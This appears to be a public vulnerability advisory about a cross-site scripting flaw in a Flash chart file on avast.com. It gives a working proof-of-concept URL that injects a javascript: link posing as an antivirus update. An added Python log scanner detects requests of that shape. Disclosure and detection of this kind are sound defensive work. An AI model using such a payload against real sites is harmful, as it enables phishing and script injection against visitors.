Avast.com suffers from a cross-site scripting vulnerability. This was sent to Packet Storm anonymously and was reported to the vendor. The vendor has not addressed the issue for months, so it is being disclosed publicly in order to shed light on the issue.
1c3a06c072fae66bc640f5b7d482bbf52f72ae43fd03ae40a890739e3abdc7e3
XSS proof of concept:
http://www.avast.com/amcolumn/amcolumn.swf?chart_settings=<settings></settings>&chart_data=<chart><message><![CDATA[<a href="javascript:confirm('An attacker can include malicious code here.')">Click here to update your antivirus</a>]]></message></chart>&.swf
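
A log check for the request shape in the proof of concept above, as an added example that is not part of the original advisory: it flags requests to a .swf path whose chart_data or chart_settings parameter carries inline markup or a script-scheme link, including double-encoded values. The function names, finding labels and log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, quote, unquote_plus, urlsplit

# Parameters the PoC on this page uses to carry chart XML inline.
INLINE_XML_PARAMS = {"chart_data", "chart_settings"}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# href/src attribute whose value starts with a script-capable scheme.
SCRIPT_LINK = re.compile(r"""(?:href|src)=["']?(?:javascript|vbscript|data):""")

def inspect_target(target):
    """Return sorted findings for one request target (path plus query)."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(".swf"):
        return []
    findings = set()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() not in INLINE_XML_PARAMS:
            continue
        # parse_qsl decoded once; decode again to catch double encoding.
        decoded = unquote_plus(value)
        if "<" in decoded:
            findings.add("inline-markup")
        # Drop whitespace and control characters that can split the scheme.
        compact = re.sub(r"[\x00-\x20]+", "", decoded).lower()
        if SCRIPT_LINK.search(compact):
            findings.add("script-link")
    return sorted(findings)

def scan(lines):
    """Map 1-based log line number to findings for every flagged line."""
    hits = {}
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        findings = inspect_target(match.group(1)) if match else []
        if findings:
            hits[number] = findings
    return hits

# Constructed sample data: a benign marker payload shaped like the PoC.
_XML = ('<chart><message><![CDATA[<a href="java\tscript:void(0)">'
        'constructed test link</a>]]></message></chart>')
_ONCE = quote(_XML, safe="")
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /amcolumn/amcolumn.swf HTTP/1.1" 200 5120',
    f'192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /amcolumn/amcolumn.swf?chart_data={_ONCE}&.swf HTTP/1.1" 200 5120',
    f'192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /amcolumn/amcolumn.swf?chart_data={quote(_ONCE, safe="")} HTTP/1.1" 200 5120',
    '192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /amcolumn/amcolumn.swf?chart_data=%3Cchart%3E%3C%2Fchart%3E HTTP/1.1" 200 5120',
]
```

Calling scan(SAMPLE_LOG) returns the flagged line numbers with their findings; "inline-markup" alone marks chart XML passed in the URL, while "script-link" marks the link pattern the proof of concept relies on.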